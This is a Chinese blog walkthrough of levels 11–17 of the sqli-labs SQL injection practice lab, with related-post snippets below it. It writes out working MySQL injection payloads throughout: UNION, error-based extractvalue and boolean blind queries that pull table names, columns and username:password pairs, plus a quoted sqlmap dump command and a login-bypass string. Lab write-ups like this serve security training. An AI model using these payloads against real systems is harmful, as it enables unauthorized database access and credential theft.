sql-labs通关记录(11-17)

最新推荐文章于 2024-07-24 23:19:51 发布
最新推荐文章于 2024-07-24 23:19:51 发布
阅读量240 收藏
点赞数 2
分类专栏: Web 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36676979/article/details/105691199
版权

less-11
发现一个登录框,第一反应是弱口令,先试试。在这里插入图片描述
接下来检测下sql注入。使用bp抓包,看字节数。
在这里插入图片描述正常的字节数,1523
加单引号’
在这里插入图片描述在这里插入图片描述单引号闭合,字节数正常,说明存在字符型注入。

先看看显示位,3报错,试试2
在这里插入图片描述在这里插入图片描述说明有两个显示位,使用联合注入。

1'union select 1,database()#

在这里插入图片描述后面就按部就班的来。

爆表

1'union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

在这里插入图片描述爆字段

1'union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述爆数据

1'union select 1,group_concat(username,":",password) from users #

在这里插入图片描述
less-12
经过和less-11一样的测试,发现是双引号加括号闭合,操作和less-11一样,将单引号改成")即可。

1")union select 1,group_concat(username,":",password) from users #

less-13
用户输入:admin’#;密码随便输。
在这里插入图片描述说明闭合条件是’)
在这里插入图片描述登陆成功,不显示任何信息,尝试报错函数。

admin')and extractvalue(1,concat(0x7e,(select database()),0x7e))#

在这里插入图片描述爆表

1')and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"),0x7e)) #

在这里插入图片描述爆字段

1')and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e)) #

在这里插入图片描述因为报错最多返回32位,所以要使用limit来输出。

1')and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name="users" limit 5,1),0x7e)) #

在这里插入图片描述
爆数据

1')and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) #

在这里插入图片描述
less-14
经过测试,是双引号闭合,将less-13中的’)换成"即可

1"and extractvalue(1,concat(0x7e,(select database()),0x7e))#

在这里插入图片描述后面就不演示了。

less-15
在这里插入图片描述说明存在字符型注入,成功或者失败都不显示信息,使用布尔注入。

1' or substr(database(),1,1)='s'#

结合bp,爆库。
在这里插入图片描述在这里插入图片描述爆表
在这里插入图片描述在这里插入图片描述爆字段
在这里插入图片描述爆数据
在这里插入图片描述less-16
测试发现输入1")or 1=1#成功登陆,且成功或失败都不显示信息,方法和less-15一样,只不过将单引号’改成")即可。

1")or substr(database(),1,1)='s'#

less-17
看到页面,显示修改密码。
在用户框尝试万能密码不行,再在密码框试试1’or 1=1#,发现
在这里插入图片描述说明密码框存在注入。

首先我们要知道用户的名字(前提)然后才可以接着进行下面的操作,即在password处进行sql注入。
经过测试,发现属于字符型注入。
在这里插入图片描述使用报错注入。

爆库

1' and extractvalue(1,concat(0x7e,database()))#

在这里插入图片描述爆表

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"),0x7e)) #

在这里插入图片描述爆字段

1'and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name="users" limit 5,1),0x7e)) #

在这里插入图片描述爆数据

1'and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) #

在这里插入图片描述提示不能在FROM句子中为update 指定目标表 users。
换个payload

1'and extractvalue(1,concat(0x7e,(select username from (select username from users limit 0,1)users limit 0,1),0x7e)) #

在这里插入图片描述也可以使用布尔注入。

qq_36676979
关注
专栏目录
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中的mysql账号密码进行安装数据库的创建 介绍几个函数:   (1)version():查看数据库版本   (2)user():查看当前用户   (3)database():查看使用的数据库   (4) limit :limit子句来分批获取所有数据   (5)group_concat():一次性获取数据库信息。
Sqli-labs通关攻略(持续更新ing
qq_50808416的博客
05-11 1532
sqli-labs详细攻略
sql-libs通关详解
最新发布
hanjinming110的博客
07-24 1402
sql-libs靶场的打靶过程
sqli_libs通关教程
qq_48904485的博客
03-22 5473
less-1 单引号联合注入 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnvwRRTo-1647921807254)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211023110308434.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmKZuH51-16479
sqli-labs通关详解
m0_52051132的博客
10-15 7029
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
SQL-labs/less1通关教程
02-29
### SQL-labs/less1通关教程详解 #### 一、理解GET传参方式与SQL注入基础 本节介绍的是如何通过GET方式传递参数来进行SQL注入的基础操作。在Web开发中,GET请求通常用于向服务器发送数据,这些数据会被附加在URL...
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
详细sqli-labs(1-20)通关讲解
05-18
### SQLi-Labs 1-20 关卡详解 #### 第一关:判断是否存在 SQL 注入 本关目的是为了帮助用户了解如何判断一个网站是否存在 SQL 注入漏洞,并通过不同的输入来观察反馈信息的变化,以此来确认是否存在漏洞。 **实验...
sql-labs通关攻略
Qqx1Ng的博客
07-06 1013
SQL-Labs 是一个用于学习和练习SQL注入的实验环境。它通常由一系列精心设计的实验室构成,旨在帮助用户理解各种SQL注入攻击的原理和防御方法。SQL-Labs通常包含多个关卡,从基础到高级,逐步提高难度,以涵盖不同类型和复杂性的SQL注入攻击。
sqli-lib64关闯关笔记学习资料.zip
08-22
总结的64关笔记,有之前师傅写的,也有我写的,可以作为参考,只要是存到这里防止丢失,有喜欢的朋友可以一起下载看看,学习一下,我常用的环境是WAMP。
sql-labs通关讲解
qq_70836100的博客
07-22 1020
目录。
sqlilabs通关()
Forrest_bear的博客
05-24 2328
就像以下代码一样:隔离空格。
sqli-labs: Less 21-65 通关教程
qq_45756971的博客
10-27 401
第二十一关: cookie注入 YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26 注: RHVtYg== 是 Dumb 经Base64加密后的值 和上关又是差不多 base64编码而已 payload: ') or 1=1 # Jykgb3IgMT0xICM= 第二十二关: 闭合为双引号 参考21关. 第二十三关: 过滤了注释符号 而已 $reg = "/#/"; $reg1 = "/--/"; $repla
Sqli-Labs 通关笔记
m0_43397796的博客
08-07 2461
Sqli-Labs靶场
Sqli-libs通关详解__第一关
henghengzhao_的博客
10-04 946
sqli-libs通关详解,第一关通关详解
SQL注入>>>sql-labs通关笔记(一)
qq_43571759的博客
02-24 1211
小记 针对如何学习SQL注入,我自己总结的三个大步骤: 1. 漏洞的判断检测和分类 2. 利用漏洞可以进行的攻击 3. 如何防御这些攻击 ps:以下指的是MySQL注入,MySQL数据库需要注意的一点: MySQL5.0以下:这个版本是没有information_schema这个系统表的(据说这是笔试会遇到的题目),所以无法列表名,只能暴力跑表名; MySQL5.0以上:这个版本默认有一个info...
sqli-labs闯关指南 1—10
热门推荐
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相关信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值